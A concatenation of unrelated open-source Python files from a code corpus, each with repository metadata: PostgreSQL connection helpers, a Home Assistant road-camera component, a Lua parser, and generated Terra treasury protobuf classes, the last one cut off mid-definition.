type is one of "STATIC" or "DYNAMIC" and depth is an integer. Behavior - static vs dynamic: In STATIC fusion, fused ops are compiled to have fixed input shapes. The shape is determined based on some initial profiling runs. In DYNAMIC fusion, fused ops are compiled to have variable input shapes, so that multiple shapes are possible. In both cases, we also recompile on new striding behavior, device, or dtype. Behavior - fallback functions & depth: When an input doesn't match the format required by the specialized compiled op, it will run a fallback function. Fallback functions are recursively be compiled and specialized based on the observed tensor shapes. Since compilation can be slow, the "depth" parameter is provided to limit the number of specializations that can be compiled, before giving up on recompiling and falling back to a completely un-fused, un-specialized implementation. The list of (type, depth) pairs controls the type of specializations and the number of specializations. For example: [("STATIC", 2), ("DYNAMIC", 2)] indicates that the first two specializations will use static fusions, the following two specializations will use dynamic fusion, and any inputs that satisfy none of the 4 options will run an unfused implementation. NB: in the future, if more as more fusion backends are added there may be more granular apis for specific fusers. """ return torch._C._jit_set_fusion_strategy(strategy)
2.265625
2
modlit/db/postgres.py
patdaburu/modlit
0
11886
<reponame>patdaburu/modlit<filename>modlit/db/postgres.py<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- # Created by pat on 5/8/18 """ .. currentmodule:: modlit.db.postgres .. moduleauthor:: <NAME> <<EMAIL>> This module contains utilities for working directly with PostgreSQL. """ import json from pathlib import Path from urllib.parse import urlparse, ParseResult from addict import Dict import psycopg2 from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT DEFAULT_ADMIN_DB = 'postgres' #: the default administrative database name DEFAULT_PG_PORT = 5432 #: the default PostgreSQL listener port # Load the Postgres phrasebook. # pylint: disable=invalid-name # pylint: disable=no-member sql_phrasebook = Dict( json.loads( ( Path(__file__).resolve().parent / 'postgres.json' ).read_text() )['sql'] ) def connect(url: str, dbname: str = None, autocommit: bool = False): """ Create a connection to a Postgres database. :param url: the Postgres instance URL :param dbname: the target database name (if it differs from the one specified in the URL) :param autocommit: Set the `autocommit` flag on the connection? :return: a psycopg2 connection """ # Parse the URL. (We'll need the pieces to construct an ogr2ogr connection # string.) dbp: ParseResult = urlparse(url) # Create a dictionary to hold the arguments for the connection. (We'll # unpack it later.) cnx_opt = { k: v for k, v in { 'host': dbp.hostname, 'port': int(dbp.port) if dbp.port is not None else DEFAULT_PG_PORT, 'database': dbname if dbname is not None else dbp.path[1:], 'user': dbp.username, 'password': <PASSWORD> }.items() if v is not None } cnx = psycopg2.connect(**cnx_opt) # If the caller requested that the 'autocommit' flag be set... if autocommit: # ...do that now. cnx.autocommit = True return cnx def db_exists(url: str, dbname: str = None, admindb: str = DEFAULT_ADMIN_DB) -> bool: """ Does a given database on a Postgres instance exist? :param url: the Postgres instance URL :param dbname: the name of the database to test :param admindb: the name of an existing (presumably the main) database :return: `True` if the database exists, otherwise `False` """ # Let's see what we got for the database name. _dbname = dbname # If the caller didn't specify a database name... if not _dbname: # ...let's figure it out from the URL. db: ParseResult = urlparse(url) _dbname = db.path[1:] # Now, let's do this! with connect(url=url, dbname=admindb) as cnx: with cnx.cursor() as crs: # Execute the SQL query that counts the databases with a specified # name. crs.execute( sql_phrasebook.select_db_count.format(_dbname) ) # If the count isn't zero (0) the database exists. return crs.fetchone()[0] != 0 def create_db( url: str, dbname: str, admindb: str = DEFAULT_ADMIN_DB): """ Create a database on a Postgres instance. :param url: the Postgres instance URL :param dbname: the name of the database :param admindb: the name of an existing (presumably the main) database """ with connect(url=url, dbname=admindb) as cnx: cnx.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT) with cnx.cursor() as crs: crs.execute(sql_phrasebook.create_db.format(dbname)) def touch_db( url: str, dbname: str = None, admindb: str = DEFAULT_ADMIN_DB): """ Create a database if it does not already exist. :param url: the Postgres instance URL :param dbname: the name of the database :param admindb: the name of an existing (presumably the main) database """ # If the database already exists, we don't need to do anything further. if db_exists(url=url, dbname=dbname, admindb=admindb): return # Let's see what we got for the database name. _dbname = dbname # If the caller didn't specify a database name... if not _dbname: # ...let's figure it out from the URL. db: ParseResult = urlparse(url) _dbname = db.path[1:] # Now we can create it. create_db(url=url, dbname=_dbname, admindb=admindb)
2.609375
3
estradaspt_legacy/__init__.py
dpjrodrigues/home-assistant-custom-components
0
11887
import logging import async_timeout import urllib.request import time import re from datetime import datetime, timedelta import voluptuous as vol import homeassistant.helpers.config_validation as cv from homeassistant.components.sensor import PLATFORM_SCHEMA from homeassistant.helpers.entity import Entity from homeassistant.helpers.entity_component import EntityComponent from homeassistant.util import Throttle from homeassistant.helpers.aiohttp_client import async_get_clientsession REQUIREMENTS = ['pyEstradasPT==1.0.2'] _LOGGER = logging.getLogger(__name__) ATTRIBUTION = "Powered by estradas.pt" CONF_CAMERA = 'camera' SCAN_INTERVAL = timedelta(minutes=5) DOMAIN = 'estradaspt' PLATFORM_SCHEMA = vol.Schema({ DOMAIN: vol.Schema({ vol.Required(CONF_CAMERA): vol.All(cv.ensure_list, [cv.string]) }) }, extra=vol.ALLOW_EXTRA) async def async_setup(hass, config): """Set up the Camera component""" from pyEstradasPT import Cameras websession = async_get_clientsession(hass) with async_timeout.timeout(10, loop=hass.loop): cameras = await Cameras.get(websession) component = EntityComponent(_LOGGER, DOMAIN, hass) entities = [] conf = config.get(DOMAIN) for camera in conf[0].get(CONF_CAMERA): url = await cameras.UrlByCameraName(camera) file_name='/config/www/'+re.sub('[^A-Za-z0-9]+', '', camera)+'.3gp' entities.append(CameraVideo(camera,file_name,url)) await store_cam_video(url, file_name) await component.async_add_entities(entities) return True async def store_cam_video(url, file_name): """Save camera 3gp """ urllib.request.urlretrieve(url, file_name) class CameraVideo(Entity): """Sensor that reads and stores the camera video.""" ICON = 'mdi:webcam' def __init__(self, name, file_name, url): """Initialize the component.""" self._name = name self._file_name = file_name self._url = url self._last_update = datetime.now() @property def name(self): """Return the name of the component.""" return self._name @property def file_name(self): """Return the file_name where camara was saved.""" return self._file_name @property def url(self): """Return the url of the camera.""" return self._file_name @property def last_update(self): """Return the date when camera url refreshed.""" return self._last_update @property def icon(self): """Icon to use in the frontend, if any.""" return self.ICON @property def device_state_attributes(self): """Return other details about the sensor state.""" attrs = {} attrs["name"] = self._name attrs["last_update"] = self._last_update attrs["file_name"] = self._file_name attrs["url"] = self._url return attrs @Throttle(SCAN_INTERVAL) async def async_update(self): """Update the cam.""" await store_cam_video(self._url, self._file_name) self._last_update = datetime.now() self.schedule_update_ha_state()
2.0625
2
parser.py
boshijingang/PyLuaCompiler
0
11888
<filename>parser.py<gh_stars>0 import lexer import ast class Parser: block_end_tokens = [lexer.TokenKind.KW_RETURN, lexer.TokenKind.EOF, lexer.TokenKind.KW_END, lexer.TokenKind.KW_ELSE, lexer.TokenKind.KW_ELSEIF, lexer.TokenKind.KW_UNTIL] priority_table = { lexer.TokenKind.OP_ADD: {'left': 10, 'right': 10}, # + lexer.TokenKind.OP_SUB: {'left': 10, 'right': 10}, # - lexer.TokenKind.OP_MUL: {'left': 11, 'right': 11}, # * lexer.TokenKind.OP_MOD: {'left': 11, 'right': 11}, # % lexer.TokenKind.OP_DIV: {'left': 11, 'right': 11}, # / lexer.TokenKind.OP_IDIV: {'left': 11, 'right': 11}, # // lexer.TokenKind.OP_POW: {'left': 14, 'right': 13}, # ^ lexer.TokenKind.OP_BAND: {'left': 6, 'right': 6}, # & lexer.TokenKind.OP_BOR: {'left': 4, 'right': 4}, # | lexer.TokenKind.OP_BNOT: {'left': 5, 'right': 5}, # ~ lexer.TokenKind.OP_SHL: {'left': 7, 'right': 7}, # << lexer.TokenKind.OP_SHR: {'left': 7, 'right': 7}, # >> lexer.TokenKind.OP_CONCAT: {'left': 9, 'right': 8}, # .. lexer.TokenKind.OP_EQ: {'left': 3, 'right': 3}, # == lexer.TokenKind.OP_LE: {'left': 3, 'right': 3}, # <= lexer.TokenKind.OP_LT: {'left': 3, 'right': 3}, # < lexer.TokenKind.OP_NE: {'left': 3, 'right': 3}, # ~= lexer.TokenKind.OP_GT: {'left': 3, 'right': 3}, # > lexer.TokenKind.OP_GE: {'left': 3, 'right': 3}, # >= lexer.TokenKind.OP_AND: {'left': 2, 'right': 2}, # and lexer.TokenKind.OP_OR: {'left': 1, 'right': 1}, # or } unops = [ lexer.TokenKind.OP_SUB, lexer.TokenKind.OP_NOT, lexer.TokenKind.OP_LEN, lexer.TokenKind.OP_BNOT ] binops = [ lexer.TokenKind.OP_ADD, lexer.TokenKind.OP_SUB, lexer.TokenKind.OP_MUL, lexer.TokenKind.OP_MOD, lexer.TokenKind.OP_POW, lexer.TokenKind.OP_DIV, lexer.TokenKind.OP_IDIV, lexer.TokenKind.OP_BAND, lexer.TokenKind.OP_BOR, lexer.TokenKind.OP_BXOR, lexer.TokenKind.OP_SHL, lexer.TokenKind.OP_SHR, lexer.TokenKind.OP_CONCAT, lexer.TokenKind.OP_NE, lexer.TokenKind.OP_EQ, lexer.TokenKind.OP_LT, lexer.TokenKind.OP_LE, lexer.TokenKind.OP_GT, lexer.TokenKind.OP_GE, lexer.TokenKind.OP_AND, lexer.TokenKind.OP_OR ] unary_priority = 12 def __init__(self, lex): self.lex = lex def parse(self): block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.EOF) return block # explist ::= exp {‘,’ exp} def parse_exp_list(self): exp_list = [] exp_list.append(self.parse_exp(0)[1]) while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() exp_list.append(self.parse_exp(0)[1]) return exp_list # exp ::= (simpleexp | unop exp) {binop exp} def parse_exp(self, prev_priority): token = self.lex.look_ahead() if token.kind in self.unops: self.lex.next_token() op_left = ast.UnopExp(self.parse_exp(self.unary_priority)[1], token.kind) else: op_left = self.parse_simple_exp() bin_op = self.lex.look_ahead().kind while bin_op in self.binops and self.priority_table[bin_op]['left'] > prev_priority: bin_op, op_left = self.parse_binop_exp(op_left, self.priority_table[bin_op]['right']) return bin_op, op_left # args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString # tableconstructor ::= ‘{’ [fieldlist] ‘}’ def parse_func_args(self): look_token = self.lex.look_ahead() exp_list = [] if look_token.kind == lexer.TokenKind.SEP_LPAREN: self.lex.next_token() if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RPAREN: exp_list = self.parse_exp_list() self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN) elif look_token.kind == lexer.TokenKind.SEP_LCURLY: exp_list = [self.parse_table_constructor_exp()] else: exp_list = [ast.String(self.lex.next_token_of_kind(lexer.TokenKind.STRING)).data] return exp_list # simpleexp ::= nil | false | true | Numeral | LiteralString | ‘...’ | # functiondef | prefixexp | tableconstructor def parse_simple_exp(self): look_token = self.lex.look_ahead() if look_token.kind == lexer.TokenKind.KW_NIL: self.lex.next_token() return ast.NilExp() elif look_token.kind == lexer.TokenKind.KW_FALSE: self.lex.next_token() return ast.BoolConstExp(False) elif look_token.kind == lexer.TokenKind.KW_TRUE: self.lex.next_token() return ast.BoolConstExp(True) elif look_token.kind == lexer.TokenKind.NUMBER: return self.parse_number_exp() elif look_token.kind == lexer.TokenKind.STRING: self.lex.next_token() return ast.StringExp(look_token.data) elif look_token.kind == lexer.TokenKind.VARARG: self.lex.next_token() return ast.VarargExp() elif look_token.kind == lexer.TokenKind.KW_FUNCTION: return self.parse_func_def_exp() elif look_token.kind == lexer.TokenKind.SEP_LCURLY: return self.parse_table_constructor_exp() else: return self.parse_prefix_exp() def parse_func_def_exp(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION) func_body_exp = self.parse_func_body_exp(False) return func_body_exp # tableconstructor ::= ‘{’ [fieldlist] ‘}’ def parse_table_constructor_exp(self): self.lex.next_token_of_kind(lexer.TokenKind.SEP_LCURLY) if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RCURLY: key_list, val_list = self.parse_field_list() else: key_list = [] val_list = [] self.lex.next_token_of_kind(lexer.TokenKind.SEP_RCURLY) return ast.TableConstructorExp(key_list, val_list) # fieldlist ::= field {fieldsep field} [fieldsep] # fieldsep ::= ‘,’ | ‘;’ def parse_field_list(self): key, val = self.parse_field() key_list = [key] val_list = [val] while self.lex.look_ahead().kind in [lexer.TokenKind.SEP_COMMA, lexer.TokenKind.SEP_SEMI]: self.lex.next_token() if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RCURLY: break else: key, val = self.parse_field() key_list.append(key) val_list.append(val) return key_list, val_list # field ::= ‘[’ exp ‘]’ ‘=’ exp | Name ‘=’ exp | exp def parse_field(self): if self.lex.look_ahead().kind == lexer.TokenKind.SEP_LBRACK: self.lex.next_token() key_exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK) self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN) val_exp = self.parse_exp(0)[1] return key_exp, val_exp exp = self.parse_exp(0)[1] if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN: if not isinstance(exp, ast.NameExp): raise Exception("syntax error near '%s'" % token) self.lex.next_token() key_exp = ast.StringExp(exp.id_name) val_exp = self.parse_exp(0)[1] return key_exp, val_exp return ast.NilExp(), exp # binop exp def parse_binop_exp(self, op_left, prev_priority): token = self.lex.next_token() if token.kind not in self.binops: raise Exception("syntax error near '%s'" % token) bin_op, op_right = self.parse_exp(prev_priority) return bin_op, ast.BinopExp(op_left, op_right, token.kind) def parse_number_exp(self): token = self.lex.next_token_of_kind(lexer.TokenKind.NUMBER) val = eval(token.data) if isinstance(val, int): return ast.IntegerExp(val) else: return ast.FloatExp(val) # retstat ::= return [explist] [‘;’] def parse_retstat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_RETURN) exp_list = [] token = self.lex.look_ahead() if not self.is_block_end(token.kind) and token.kind != lexer.TokenKind.SEP_SEMI: exp_list = self.parse_exp_list() return ast.RetStat(exp_list) # block ::= {stat} [retstat] def parse_block(self): stats = self.parse_stats() block = ast.Block(stats) if self.lex.look_ahead().kind == lexer.TokenKind.KW_RETURN: retstat = self.parse_retstat() block.append_stat(retstat) return block def parse_goto_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_GOTO) label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER) return ast.GotoStat(label) def parse_do_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_DO) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.DoStat(block) def parse_while_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_WHILE) exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.KW_DO) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.WhileStat(exp, block) def parse_repeat_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_REPEAT) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_UNTIL) exp = self.parse_exp(0)[1] return ast.RepeatStat(exp, block) def parse_if_stat(self): exp_list = [] block_list = [] self.lex.next_token_of_kind(lexer.TokenKind.KW_IF) exp = self.parse_exp(0)[1] exp_list.append(exp) self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN) block = self.parse_block() block_list.append(block) while self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSEIF: self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSEIF) exp_list.append(self.parse_exp(0)[1]) self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN) block_list.append(self.parse_block()) if self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSE: self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSE) exp_list.append(ast.BoolConstExp(True)) block_list.append(self.parse_block()) self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.IfStat(exp_list, block_list) def parse_for_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_FOR) name = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data) if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN: return self.finish_for_num_stat(name) else: return self.finish_for_in_stat(name) def finish_for_num_stat(self, var): self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN) init_exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.SEP_COMMA) limit_exp = self.parse_exp(0)[1] step_exp = None if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() step_exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.KW_DO) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.ForNumStat(var, init_exp, limit_exp, step_exp, block) def finish_for_in_stat(self, name): var_list = self.parse_name_list(name) self.lex.next_token_of_kind(lexer.TokenKind.KW_IN) exp_list = self.parse_exp_list() self.lex.next_token_of_kind(lexer.TokenKind.KW_DO) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.ForInStat(var_list, exp_list, block) def parse_func_def_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION) func_name_exp, has_colon = self.parse_func_name_exp() func_body_exp = self.parse_func_body_exp(has_colon) return ast.AssignStat([func_name_exp], [func_body_exp]) # parlist ::= namelist [‘,’ ‘...’] | ‘...’ # namelist ::= Name {‘,’ Name} def parse_parlist(self): parlist = [] is_var_arg = False if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RPAREN: return parlist, is_var_arg if self.lex.look_ahead().kind == lexer.TokenKind.VARARG: is_var_arg = True self.lex.next_token() return parlist, is_var_arg parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() if self.lex.look_ahead().kind == lexer.TokenKind.IDENTIFIER: parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) else: self.lex.next_token_of_kind(lexer.TokenKind.VARARG) is_var_arg = True break return parlist, is_var_arg # funcbody ::= ‘(’ [parlist] ‘)’ block end def parse_func_body_exp(self, has_colon): self.lex.next_token_of_kind(lexer.TokenKind.SEP_LPAREN) parlist, is_var_arg = self.parse_parlist() self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN) if has_colon: parlist.insert(0, ast.StringExp('self')) body = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.FunctionDefExp(parlist, is_var_arg, body) # funcname ::= Name {‘.’ Name} [‘:’ Name] def parse_func_name_exp(self): has_colon = False name_exp = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data) while self.lex.look_ahead().kind == lexer.TokenKind.SEP_DOT: self.lex.next_token() name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COLON: self.lex.next_token() name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) has_colon = True return name_exp, has_colon def parse_local_def_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_LOCAL) if self.lex.look_ahead().kind == lexer.TokenKind.KW_FUNCTION: return self.parse_local_func_def_stat() else: return self.parse_local_var_decl_stat() # namelist ::= Name {‘,’ Name} def parse_name_list(self, name=None): if name: var_list = [name] else: var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)] while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() var_list.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) return var_list # local function Name funcbody def parse_local_func_def_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION) var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)] exp_list = [self.parse_func_body_exp(False)] return ast.LocalDeclStat(var_list, exp_list) # local namelist [‘=’ explist] def parse_local_var_decl_stat(self): var_list = self.parse_name_list() exp_list = [] if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN: self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN) exp_list = self.parse_exp_list() return ast.LocalDeclStat(var_list, exp_list) # var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name # functioncall ::= prefixexp args | prefixexp ‘:’ Name args # prefixexp ::= var | functioncall | ‘(’ exp ‘)’ # prefixexp ::= prefixexp args # | prefixexp ‘:’ Name args # | prefixexp ‘[’ exp ‘]’ # | prefixexp ‘.’ Name # | ‘(’ exp ‘)’ # | Name # args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString # tableconstructor ::= ‘{’ [fieldlist] ‘}’ def parse_prefix_exp(self): look_token = self.lex.look_ahead() if look_token.kind == lexer.TokenKind.SEP_LPAREN: self.lex.next_token() exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN) else: name = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER) exp = ast.NameExp(name.data) while True: look_token = self.lex.look_ahead() if look_token.kind == lexer.TokenKind.SEP_DOT: self.lex.next_token() idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data) exp = ast.TableAccessExp(exp, idx_exp) elif look_token.kind == lexer.TokenKind.SEP_COLON: self.lex.next_token() args_exp = [exp] idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data) exp = ast.TableAccessExp(exp, idx_exp) args_exp.extend(self.parse_func_args()) exp = ast.FunctionCallExp(exp, args_exp) elif look_token.kind in [lexer.TokenKind.SEP_LPAREN, lexer.TokenKind.SEP_LCURLY, lexer.TokenKind.STRING]: args_exp = self.parse_func_args() exp = ast.FunctionCallExp(exp, args_exp) elif look_token.kind == lexer.TokenKind.SEP_LBRACK: self.lex.next_token() idx_exp = self.parse_exp(0)[1] exp = ast.TableAccessExp(exp, idx_exp) self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK) else: break return exp # varlist ‘=’ explist # functioncall def parse_assign_or_func_call_stat(self): exp = self.parse_prefix_exp() look_token = self.lex.look_ahead() if look_token.kind in [lexer.TokenKind.OP_ASSIGN, lexer.TokenKind.SEP_COMMA]: return self.finsh_assign_stat(exp) elif isinstance(exp, ast.FunctionCallExp): return exp else: raise Exception("syntax error near '%s'" % look_token) def check_var(self, exp): if isinstance(exp, ast.TableAccessExp) or isinstance(exp, ast.NameExp): return exp raise Exception("syntax error near '%s'" % token) # varlist ‘=’ explist # varlist ::= var {‘,’ var} # var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name def finsh_assign_stat(self, first_var): var_list = [first_var] while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() var_list.append(self.check_var(self.parse_prefix_exp())) self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN) exp_list = self.parse_exp_list() return ast.AssignStat(var_list, exp_list) """ stat ::= ‘;’ | break | ::Name:: | goto Name | do block end | while exp do block end | repeat block until exp | if exp then block {elseif exp then block} [else block] end | for Name ‘=’ exp ‘,’ exp [‘,’ exp] do block end | for namelist in explist do block end | function funcname funcbody | local function Name funcbody | local namelist [‘=’ explist] varlist ‘=’ explist | functioncall """ def parse_stat(self): token = self.lex.look_ahead() if token.kind == lexer.TokenKind.SEP_SEMI: return self.parse_empty_stat() elif token.kind == lexer.TokenKind.KW_BREAK: return self.parse_break_stat() elif token.kind == lexer.TokenKind.SEP_LABEL: return self.parse_label_stat() elif token.kind == lexer.TokenKind.KW_GOTO: return self.parse_goto_stat() elif token.kind == lexer.TokenKind.KW_DO: return self.parse_do_stat() elif token.kind == lexer.TokenKind.KW_WHILE: return self.parse_while_stat() elif token.kind == lexer.TokenKind.KW_REPEAT: return self.parse_repeat_stat() elif token.kind == lexer.TokenKind.KW_IF: return self.parse_if_stat() elif token.kind == lexer.TokenKind.KW_FOR: return self.parse_for_stat() elif token.kind == lexer.TokenKind.KW_FUNCTION: return self.parse_func_def_stat() elif token.kind == lexer.TokenKind.KW_LOCAL: return self.parse_local_def_stat() else: return self.parse_assign_or_func_call_stat() def parse_empty_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.SEP_SEMI) def parse_break_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_BREAK) return ast.BreakStat() def parse_label_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL) label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER) self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL) return ast.LabelStat(label) def parse_stats(self): stats = [] while not self.is_block_end(self.lex.look_ahead().kind): stat = self.parse_stat() if stat: stats.append(stat) return stats def is_block_end(self, kind): if kind in self.block_end_tokens: return True return False
2.453125
2
python/terra_proto/terra/treasury/v1beta1/__init__.py
Vritra4/terra.proto
0
11889
# Generated by the protocol buffer compiler. DO NOT EDIT! # sources: terra/treasury/v1beta1/genesis.proto, terra/treasury/v1beta1/query.proto, terra/treasury/v1beta1/treasury.proto # plugin: python-betterproto from dataclasses import dataclass from typing import Dict, List import betterproto from betterproto.grpc.grpclib_server import ServiceBase import grpclib @dataclass(eq=False, repr=False) class Params(betterproto.Message): """Params defines the parameters for the oracle module.""" tax_policy: "PolicyConstraints" = betterproto.message_field(1) reward_policy: "PolicyConstraints" = betterproto.message_field(2) seigniorage_burden_target: str = betterproto.string_field(3) mining_increment: str = betterproto.string_field(4) window_short: int = betterproto.uint64_field(5) window_long: int = betterproto.uint64_field(6) window_probation: int = betterproto.uint64_field(7) @dataclass(eq=False, repr=False) class PolicyConstraints(betterproto.Message): """ PolicyConstraints - defines policy constraints can be applied in tax & reward policies """ rate_min: str = betterproto.string_field(1) rate_max: str = betterproto.string_field(2) cap: "___cosmos_base_v1_beta1__.Coin" = betterproto.message_field(3) change_rate_max: str = betterproto.string_field(4) @dataclass(eq=False, repr=False) class EpochTaxProceeds(betterproto.Message): """ EpochTaxProceeds represents the tax amount collected at the current epoch """ tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1) @dataclass(eq=False, repr=False) class EpochInitialIssuance(betterproto.Message): """ EpochInitialIssuance represents initial issuance of the currrent epoch """ issuance: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1) @dataclass(eq=False, repr=False) class QueryTaxRateRequest(betterproto.Message): """ QueryTaxRateRequest is the request type for the Query/TaxRate RPC method. """ pass @dataclass(eq=False, repr=False) class QueryTaxRateResponse(betterproto.Message): """ QueryTaxRateResponse is response type for the Query/TaxRate RPC method. """ tax_rate: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryTaxCapRequest(betterproto.Message): """ QueryTaxCapRequest is the request type for the Query/TaxCap RPC method. """ # denom defines the denomination to query for. denom: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryTaxCapResponse(betterproto.Message): """ QueryTaxCapResponse is response type for the Query/TaxCap RPC method. """ tax_cap: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryTaxCapsRequest(betterproto.Message): """ QueryTaxCapsRequest is the request type for the Query/TaxCaps RPC method. """ pass @dataclass(eq=False, repr=False) class QueryTaxCapsResponseItem(betterproto.Message): """ QueryTaxCapsResponseItem is response item type for the Query/TaxCaps RPC method. """ denom: str = betterproto.string_field(1) tax_cap: str = betterproto.string_field(2) @dataclass(eq=False, repr=False) class QueryTaxCapsResponse(betterproto.Message): """ QueryTaxCapsResponse is response type for the Query/TaxCaps RPC method. """ tax_caps: List["QueryTaxCapsResponseItem"] = betterproto.message_field(1) @dataclass(eq=False, repr=False) class QueryRewardWeightRequest(betterproto.Message): """ QueryRewardWeightRequest is the request type for the Query/RewardWeight RPC method. """ pass @dataclass(eq=False, repr=False) class QueryRewardWeightResponse(betterproto.Message): """ QueryRewardWeightResponse is response type for the Query/RewardWeight RPC method. """ reward_weight: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryTaxProceedsRequest(betterproto.Message): """ QueryTaxProceedsRequest is the request type for the Query/TaxProceeds RPC method. """ pass @dataclass(eq=False, repr=False) class QueryTaxProceedsResponse(betterproto.Message): """ QueryTaxProceedsResponse is response type for the Query/TaxProceeds RPC method. """ tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1) @dataclass(eq=False, repr=False) class QuerySeigniorageProceedsRequest(betterproto.Message): """ QuerySeigniorageProceedsRequest is the request type for the Query/SeigniorageProceeds RPC method. """ pass @dataclass(eq=False, repr=False) class QuerySeigniorageProceedsResponse(betterproto.Message): """ QuerySeigniorageProceedsResponse is response type for the Query/SeigniorageProceeds RPC method. """ seigniorage_proceeds: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryIndicatorsRequest(betterproto.Message): """ QueryIndicatorsRequest is the request type for the Query/Indicators RPC method. """ pass @dataclass(eq=False, repr=False) class QueryIndicatorsResponse(betterproto.Message): """ QueryIndicatorsResponse is response type for the Query/Indicators RPC method. """ trl_year: str = betterproto.string_field(1) trl_month: str = betterproto.string_field(2) @dataclass(eq=False, repr=False) class QueryParamsRequest(betterproto.Message): """ QueryParamsRequest is the request type for the Query/Params RPC method. """ pass @dataclass(eq=False, repr=False) class QueryParamsResponse(betterproto.Message): """ QueryParamsResponse is the response type for the Query/Params RPC method. """ # params defines the parameters of the module. params: "Params" = betterproto.message_field(1) @dataclass(eq=False, repr=False) class GenesisState(betterproto.Message): """GenesisState defines the oracle module's genesis state.""" params: "Params" = betterproto.message_field(1) tax_rate: str = betterproto.string_field(2) reward_weight: str = betterproto.string_field(3) tax_caps: List["TaxCap"] = betterproto.message_field(4) tax_proceeds: 